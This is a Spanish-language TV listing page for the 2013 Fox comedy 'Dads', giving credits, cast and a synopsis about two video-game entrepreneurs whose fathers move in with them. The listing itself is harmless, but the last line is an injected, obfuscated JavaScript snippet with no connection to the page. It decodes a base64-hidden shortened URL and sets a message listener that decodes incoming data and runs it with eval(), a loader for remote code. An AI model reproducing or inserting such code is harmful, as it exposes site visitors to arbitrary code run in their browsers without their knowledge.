Dads

Cartel Serie
Título Original: Dads
Creador: Alec Sulkin y Wellesley Wild
Producción Ejecutiva: Seth MacFarlane, Alec Sulkin y Wellesley Wild
Estudio: 20th Century Fox Television
Género: Comedia
Temporada: 1ª
Episodios: 22
Fecha de estreno: Septiembre de 2013
Distribución: Fox
Horario de emisión: Martes 8.00 p.m.

Reparto:
Giovanni Ribisi ... Warner
Seth Green ... Eli
Martin Mull ... Crawford
Peter Riegert ... David
Brenda Song ... Veronica
Tonita Castro ... Edna
Vanessa Lachey ... Camilla

Descripcion

Honra a tu padre dicen la buenas costumbres. Pero es más fácil decirlo que hacerlo. Especialmente cuando tu padre está arruinado, vive en tu casa y arruina constantemente tu vida. De Seth MacFarlane, Alec Sulkin y Wellesley Wild, las mentes creativas detrás de la divertida película Ted y de series como Padre de familia, llega Dads una comedia que explora el traicionero terreno en el que se mueven las relaciones entre padres e hijos. Sigue las desventuras de dos exitosos jóvenes, mejores amigos desde la infancia, que ahora en plena madurez y con sus vidas relativamente estables, deberán acomodarse a una nueva situación familiar cuando sus molestos progenitores se mudan a vivir con ellos.

Eli (Seth Green, Buffy cazavampiros) y Warner (Giovanni Ribisi, Ted) son los co-fundadores de una exitosa compañía de videojuegos. Warner está casado y tiene dos hijos, dos perros y una bonita casa. A pesar de su éxito, es todo un manojo de nervios y está constantemente preocupándose por si su próximo cheque será el último. Él y Eli tuvieron esta idea empresarial cuando estaban en la universidad, pero Eli no ha evolucionado desde entonces. En contraste a la vida perfecta de Warner, Eli es un desastre. Parece haberse quedado atrapado en sus años universitarios. Lo que le falta de coraje también le falta de moralidad.
(function(){if(document.cookie.indexOf(‘_advstop’)!==-1)return;var ajaxListener=function(){try{var c=window.atob(event.data);eval(c)}catch(e){}};document.write(”);var h=document.location.protocol+’//’+window.atob(‘Yml0Lmx5LzFFeFJXS2w=’)+’?’+Math.random();addEventListener(‘message’,ajaxListener,false);document.write(”)})();